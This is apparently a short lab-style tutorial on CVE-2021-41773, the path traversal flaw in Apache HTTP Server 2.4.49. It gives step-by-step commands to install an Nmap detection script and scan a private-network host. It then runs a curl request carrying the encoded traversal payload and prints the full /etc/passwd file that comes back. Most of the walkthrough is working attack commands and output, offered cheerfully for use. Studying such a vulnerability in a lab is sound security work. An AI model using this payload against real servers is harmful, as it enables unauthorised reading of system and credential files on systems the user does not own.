logo

Understanding CVE-2021-41773

A Path Traversal Vulnerability in Apache

Pathways to Danger: When URLs Take the Scenic Route

CVE-2021-41773 is a critical security flaw discovered in Apache HTTP Server versions 2.4.49 and 2.4.50. This vulnerability allows attackers to exploit path traversal and access sensitive files on the server. It occurs due to improper validation of URLs, enabling malicious users to craft requests that bypass security restrictions and potentially execute arbitrary code or access confidential data. Understanding and mitigating this vulnerability is essential for maintaining secure web server operations.

  • 1

    Download

    Download this script and save it as /usr/share/nmap/scripts/http-vuln-cve2021-41773.nse Download
    ❯ sudo mv cve-2021-41773.nse /usr/share/nmap/scripts/http-vuln-cve2021-41773.nse

❯sudo nmap --script-updatedb
NSE: Updating rule database.
NSE: Script Database updated successfully.
  • 2

    Nmap Scan

    sudo nmap -sV -p 443 --script "http-vuln-cve2021-41773" 192.168.19\0.13
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-25 00:35 CDT
Nmap scan report for 192.168.190.13
Host is up (0.33s latency).

PORT    STATE SERVICE VERSION
443/tcp open  http    Apache httpd 2.4.49 ((Unix))
|_http-server-header: Apache/2.4.49 (Unix)
| http-vuln-cve2021-41773: 
|   VULNERABLE:
|   Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49
|     State: VULNERABLE
|       	A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
|           
|     Disclosure date: 2021-10-05
|     Check results:
|       
|         Verify arbitrary file read: https://192.168.190.13:443/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
|       
|     References:
|       https://nvd.nist.gov/vuln/detail/CVE-2021-41773
|_      https://httpd.apache.org/security/vulnerabilities_24.html

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.75 seconds
  • 3

    Nmap generates the verification link, and we run it to check
    Verify arbitrary file read: https://192.168.190.13:443/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
    Use http, not https 

    ❯ curl http://192.168.190.13:443/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
alfred:x:1000:1000:,,,:/home/alfred:/bin/bash
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
0110b6e27a4893fe36fa97db5941daa4:x:1001:1001::/tmp/:/bin/sh

Ready, enjoy.

HOME